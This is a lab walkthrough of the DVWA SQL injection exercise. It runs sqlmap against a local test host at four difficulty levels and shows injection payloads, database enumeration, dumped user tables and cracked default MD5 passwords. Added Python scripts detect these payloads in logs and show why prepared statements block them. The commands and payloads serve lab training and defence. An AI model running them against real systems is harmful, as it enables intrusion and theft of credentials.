[DVWA Complete Guide] Using sqlmap to complete the DVWA SQL Injection exercise


DVWA SQL Injection exercise

Using sqlmap to complete the DVWA SQL injection exercise

Normal function

Enter an id and the page shows the user name that corresponds to it.


How to determine the SQL injection type

Determine whether the injection is numeric or string-based, i.e. whether the input lands in the query unquoted or inside quotes:

Numeric

$id = $_GET['content'];
select * from users where id=1

String

$id = $_GET['content'];
select * from users where id='admin'

Low difficulty

Code analysis

<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        $html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }
    mysqli_close($GLOBALS["___mysqli_ston"]);

}
?>

The code above does no input filtering: whatever we enter is passed straight into $id and concatenated into the query string, so the input is where to look.

$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

Finding the injection point

Because DVWA requires a username/password login by default, the logged-in session has to be passed with --cookie (the security cookie selects the difficulty level) so that sqlmap can reach the page; only then can it scan for the injection.

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=pimuhjh6udoe422658b7dl0g37"

sqlmap reports the following injection points:

sqlmap identified the following injection point(s) with a total of 150 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=2' OR NOT 4391=4391#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=2' AND GTID_SUBSET(CONCAT(0x717a6a7171,(SELECT (ELT(8715=8715,1))),0x716a6a7871),8715)-- ZTFh&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 7666 FROM (SELECT(SLEEP(5)))rSxl)-- MbUf&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=2' UNION ALL SELECT NULL,CONCAT(0x717a6a7171,0x6359625a4c596e436c4e65415a5869486d727048546d4748475467474b7355467a4b4f4946556979,0x716a6a7871)#&Submit=Submit
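The payload shapes in this sqlmap output are also what the target's web server writes to its access log, which is where a defender notices a scan. The Python script below is an added example and is not part of the original post, sqlmap or DVWA: it parses constructed Apache-style log lines (the request paths are assumptions modelled on the payloads above), flags the four technique signatures sqlmap reported (boolean tautology, GTID_SUBSET error-based, SLEEP time-based, UNION SELECT) plus the q...q hex boundary markers sqlmap wraps extracted data in, and tallies techniques per client IP.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log lines in Apache combined-style format (not captured from
# the lab above). The query strings mirror the payload shapes sqlmap reported: boolean-based,
# error-based (GTID_SUBSET), time-based (SLEEP) and UNION. Lines 1 and 6 are benign lookups.
SAMPLE_LOG = """\
192.168.47.1 - - [30/Mar/2021:11:26:47 +0800] "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4211
192.168.47.1 - - [30/Mar/2021:11:27:01 +0800] "GET /dvwa/vulnerabilities/sqli/?id=2%27%20OR%20NOT%204391%3D4391%23&Submit=Submit HTTP/1.1" 200 4180
192.168.47.1 - - [30/Mar/2021:11:27:02 +0800] "GET /dvwa/vulnerabilities/sqli/?id=2%27%20AND%20GTID_SUBSET%28CONCAT%280x717a6a7171%2C%28SELECT%20%28ELT%288715%3D8715%2C1%29%29%29%2C0x716a6a7871%29%2C8715%29--%20ZTFh&Submit=Submit HTTP/1.1" 200 4300
192.168.47.1 - - [30/Mar/2021:11:27:09 +0800] "GET /dvwa/vulnerabilities/sqli/?id=2%27%20AND%20%28SELECT%207666%20FROM%20%28SELECT%28SLEEP%285%29%29%29rSxl%29--%20MbUf&Submit=Submit HTTP/1.1" 200 4211
192.168.47.1 - - [30/Mar/2021:11:27:10 +0800] "GET /dvwa/vulnerabilities/sqli/?id=2%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6a7171%2C0x63%2C0x716a6a7871%29%23&Submit=Submit HTTP/1.1" 200 4400
192.168.47.1 - - [30/Mar/2021:11:28:00 +0800] "GET /dvwa/vulnerabilities/sqli/?id=3&Submit=Submit HTTP/1.1" 200 4211
"""

# One signature per technique type seen in the sqlmap output, matched against the
# URL-decoded query string. The marker rule catches sqlmap's 0x71....71 ("q...q")
# boundary strings that bracket extracted data in error-based and UNION payloads.
SIGNATURES = {
    "boolean-based": re.compile(r"\b(?:AND|OR)\s+(?:NOT\s+)?\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(r"\bGTID_SUBSET\s*\(", re.I),
    "time-based": re.compile(r"\bSLEEP\s*\(\s*\d+", re.I),
    "union": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "sqlmap-marker": re.compile(r"0x71[0-9a-f]{6}71", re.I),
}

# Minimal combined-log parser: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+) \S+'
)


def classify_request(path):
    """Return the set of signature names matching the decoded query string of a request path."""
    query = path.partition("?")[2]
    decoded = unquote_plus(query)  # payloads arrive URL-encoded; match the decoded form
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}


def scan_log(text):
    """Return a list of (ip, timestamp, decoded path, sorted signature names) for suspicious lines."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_request(m["path"])
        if hits:
            findings.append((m["ip"], m["ts"], unquote_plus(m["path"]), sorted(hits)))
    return findings


def summarize_by_source(findings):
    """Count suspicious requests and distinct injection techniques per client IP."""
    summary = {}
    for ip, _ts, _path, hits in findings:
        entry = summary.setdefault(ip, {"requests": 0, "techniques": set()})
        entry["requests"] += 1
        entry["techniques"].update(h for h in hits if h != "sqlmap-marker")
    return summary


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for ip, ts, path, hits in results:
        print(f"{ts} {ip} {', '.join(hits):28} {path}")
    for ip, entry in summarize_by_source(results).items():
        print(f"{ip}: {entry['requests']} suspicious requests, techniques={sorted(entry['techniques'])}")
```

Decoding before matching is the important detail: the raw log line contains no literal SLEEP( or UNION, only %28 and %20 sequences. A single client using several distinct techniques within seconds is the pattern that distinguishes an automated scanner from a one-off malformed request.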

Enumerating databases

List the databases on the server:

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --dbs

The following databases are found:

[11:28:06] [INFO] fetching database names
[11:28:06] [WARNING] reflective value(s) found and filtering out
available databases [3]:
[*] dvwa
[*] information_schema
[*] test

Enumerating tables

List the table names in the dvwa database:

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=pimuhjh6udoe422658b7dl0g37" -D dvwa --tables

Two tables are found: guestbook and users.

[11:43:31] [INFO] fetching tables for database: 'dvwa'
[11:43:31] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

Enumerating table columns

List the columns of the users table:

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=pimuhjh6udoe422658b7dl0g37" -D dvwa -T users --columns

Each column's name and data type are shown:

[13:37:44] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int(6)      |
+--------------+-------------+

Dumping the values of specific columns

Dump the user and password column values from the users table in the dvwa database (sqlmap selects columns with -C and dumps them with --dump):

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=pimuhjh6udoe422658b7dl0g37" -D dvwa -T users -C user,password --dump

sqlmap recognises the MD5 hashes in the password column and cracks the simple ones with its built-in dictionary, so the user passwords are recovered directly without an online MD5 lookup:

do you want to use common password suffixes? (slow!) [y/N]
[13:47:22] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[13:47:22] [INFO] starting 8 processes
[13:47:23] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[13:47:24] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[13:47:26] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
[13:47:27] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
Database: dvwa
Table: users
[5 entries]
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | user    | avatar                           | password                                    | last_name | first_name | last_login          | failed_login |
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1       | admin   | /dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2021-03-30 11:26:47 | 0            |
| 2       | gordonb | /dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2021-03-30 11:26:47 | 0            |
| 3       | 1337    | /dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2021-03-30 11:26:47 | 0            |
| 4       | pablo   | /dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      | 2021-03-30 11:26:47 | 0            |
| 5       | smithy  | /dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2021-03-30 11:26:47 | 0            |
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+

Medium difficulty

Code analysis

<?php

if( isset( $_POST[ 'Submit' ] ) ) {

    // Get input
    $id = $_POST[ 'id' ];
    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        $html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?>

The code above escapes special characters in the input with mysqli_real_escape_string, and the front end now uses a drop-down list, turning the earlier GET request into a POST request. Because $id is interpolated into the query unquoted (a numeric context), the escaping does not help: a payload that contains no quote characters, like the ones sqlmap finds below, passes through untouched.

Procedure

Finding the injection point

The value is now sent in the POST body, so it is passed to sqlmap with --data:

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit"

Several types of injection are found:

[17:12:26] [INFO] POST parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (8328=8328) THEN 2 ELSE (SELECT 4432 UNION SELECT 9630) END))&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=2 AND GTID_SUBSET(CONCAT(0x717a6a7171,(SELECT (ELT(1202=1202,1))),0x716a6a7871),1202)&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2 AND (SELECT 2862 FROM (SELECT(SLEEP(5)))gLnf)&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=2 UNION ALL SELECT CONCAT(0x717a6a7171,0x55506e6a56597642546f5571454645716847774e5158616e557766706342496b4a7a676f45486173,0x716a6a7871),NULL-- -&Submit=Submit
---

Enumerating databases

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --dbs

The databases recovered are dvwa, information_schema and test:

[17:14:43] [INFO] fetching database names
available databases [3]:
[*] dvwa
[*] information_schema
[*] test

Enumerating tables

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --tables -D "dvwa"

The tables recovered are guestbook and users:

[17:24:40] [INFO] fetching tables for database: 'dvwa'
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

Enumerating table columns

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --columns -D "dvwa" -T "users"

The columns of the users table:

[17:34:08] [INFO] fetching columns for table 'users' in database 'dvwa'
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int(6)      |
+--------------+-------------+

Dumping the values of specific columns

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" -D "dvwa" -T "users" -C user,password --dump

Dump the user and password values from the table. The hashes were already cracked in the Low run, so sqlmap resumes them from its session file:

[17:35:25] [INFO] fetching columns for table 'users' in database 'dvwa'
[17:35:25] [INFO] fetching entries for table 'users' in database 'dvwa'
[17:35:25] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[17:35:29] [INFO] using hash method 'md5_generic_passwd'
[17:35:29] [INFO] resuming password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[17:35:29] [INFO] resuming password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[17:35:29] [INFO] resuming password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[17:35:29] [INFO] resuming password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
Database: dvwa
Table: users
[5 entries]
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | user    | avatar                           | password                                    | last_name | first_name | last_login          | failed_login |
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1       | admin   | /dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2021-03-30 11:26:47 | 0            |
| 2       | gordonb | /dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2021-03-30 11:26:47 | 0            |
| 3       | 1337    | /dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2021-03-30 11:26:47 | 0            |
| 4       | pablo   | /dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      | 2021-03-30 11:26:47 | 0            |
| 5       | smithy  | /dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2021-03-30 11:26:47 | 0            |
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+

High difficulty

Code analysis

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];
        // Feedback for end user
        $html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }
    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>

At High difficulty the value is submitted through a separate session-input.php page, stored in the session and only then read by the original page. The query itself is still built by string concatenation, so this blocks a plain sqlmap run only to a degree; sqlmap is still powerful enough, and raising --level gets around it.

Finding the injection point

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --level=2

Several types of injection are found:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (8328=8328) THEN 2 ELSE (SELECT 4432 UNION SELECT 9630) END))&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=2 AND GTID_SUBSET(CONCAT(0x717a6a7171,(SELECT (ELT(1202=1202,1))),0x716a6a7871),1202)&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2 AND (SELECT 2862 FROM (SELECT(SLEEP(5)))gLnf)&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=2 UNION ALL SELECT CONCAT(0x717a6a7171,0x55506e6a56597642546f5571454645716847774e5158616e557766706342496b4a7a676f45486173,0x716a6a7871),NULL-- -&Submit=Submit
---

Enumerating databases

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --dbs

The databases recovered are dvwa, information_schema and test:

[17:14:43] [INFO] fetching database names
available databases [3]:
[*] dvwa
[*] information_schema
[*] test

Enumerating tables

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --level=2 --dbs

The tables recovered are guestbook and users:

[21:50:18] [INFO] fetching database names
available databases [3]:
[*] dvwa
[*] information_schema
[*] test

Enumerating table columns

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --columns -D "dvwa" -T "users" --level=2

The columns of the users table:

[21:51:52] [INFO] fetching columns for table 'users' in database 'dvwa'
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int(6)      |
+--------------+-------------+

Dumping the values of specific columns

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" -D "dvwa" -T "users" -C user,password --dump --level=2

Dump the user and password values from the table:

Database: dvwa
Table: users
[5 entries]
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | user    | avatar                           | password                                    | last_name | first_name | last_login          | failed_login |
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1       | admin   | /dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2021-03-30 11:26:47 | 0            |
| 2       | gordonb | /dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2021-03-30 11:26:47 | 0            |
| 3       | 1337    | /dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2021-03-30 11:26:47 | 0            |
| 4       | pablo   | /dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      | 2021-03-30 11:26:47 | 0            |
| 5       | smithy  | /dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2021-03-30 11:26:47 | 0            |
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+

Impossible difficulty

Code analysis

<?php
if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();
        $row = $data->fetch();

        // Make sure only 1 result is returned
        if( $data->rowCount() == 1 ) {
            // Get values
            $first = $row[ 'first_name' ];
            $last  = $row[ 'last_name' ];

            // Feedback for end user
            $html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();
?>

The code above switches to a PDO prepared statement: the id is first checked with is_numeric, then bound as an integer parameter instead of being concatenated into the query, and only a single returned row is accepted. It also validates a user_token to prevent CSRF attacks.
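The three code analyses above (the numeric-versus-string distinction, Medium's escaping and Impossible's prepared statement) come down to where the id lands in the query. The following Python script is an added example, not code from the post or from DVWA: it builds a constructed copy of the users table in sqlite3 (an assumption standing in for MySQL; only the name columns, no password hashes) and runs the same inputs through a Low-style quoted interpolation, a Medium-style escaped-but-unquoted interpolation (escape_like_mysqli is an approximation of mysqli_real_escape_string) and an Impossible-style numeric check plus bound integer parameter. The input shapes are the boolean tautologies from the sqlmap output above.

```python
import re
import sqlite3

# Constructed copy of DVWA's users table, seeded with the five accounts from the dump above
# (name columns only). sqlite3 stands in for MySQL; quoted vs. unquoted vs. bound-parameter
# contexts behave the same way in both.
USERS = [
    (1, "admin",   "admin",  "admin"),
    (2, "gordonb", "Gordon", "Brown"),
    (3, "1337",    "Hack",   "Me"),
    (4, "pablo",   "Pablo",  "Picasso"),
    (5, "smithy",  "Bob",    "Smith"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, user TEXT, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", USERS)
    return conn


def escape_like_mysqli(value):
    """Approximation (assumption) of mysqli_real_escape_string: backslash-escape the characters it handles."""
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\0": "\\0", "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}
    return "".join(table.get(ch, ch) for ch in value)


def run(conn, sql, params=()):
    """Execute and return the rows, or None when the database rejects the SQL (a syntax error)."""
    try:
        return conn.execute(sql, params).fetchall()
    except sqlite3.Error:
        return None


def lookup_low(conn, user_id):
    # Low: raw input interpolated INSIDE quotes, so a quote in the input ends the string
    # and everything after it is parsed as SQL.
    return run(conn, f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'")


def lookup_medium(conn, user_id):
    # Medium: quotes are escaped, but the value is interpolated UNQUOTED (numeric context).
    # A quote-bearing payload now breaks the query, but a payload with no quotes at all
    # is passed through by the escaping unchanged.
    escaped = escape_like_mysqli(user_id)
    return run(conn, f"SELECT first_name, last_name FROM users WHERE user_id = {escaped}")


def lookup_impossible(conn, user_id):
    # Impossible: reject anything that is not a plain integer (stricter than PHP's is_numeric,
    # which also accepts floats), bind the value as a parameter, and accept exactly one row.
    if not re.fullmatch(r"\d+", user_id):
        return []
    rows = run(conn, "SELECT first_name, last_name FROM users WHERE user_id = ? LIMIT 1", (int(user_id),))
    return rows if rows and len(rows) == 1 else []


if __name__ == "__main__":
    conn = make_db()
    inputs = ["2", "2' OR 4391=4391 -- ", "2 OR 4391=4391"]
    for fn in (lookup_low, lookup_medium, lookup_impossible):
        for value in inputs:
            rows = fn(conn, value)
            outcome = "SQL error" if rows is None else f"{len(rows)} row(s)"
            print(f"{fn.__name__:18} {value!r:26} -> {outcome}")
```

Running it shows the progression the page documents: the Low query returns all five rows for the quoted tautology, the Medium query rejects that same input with a syntax error but returns all five rows for the unquoted form, and the Impossible lookup returns one row for "2" and nothing for either payload, because the value is never parsed as SQL in the first place.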
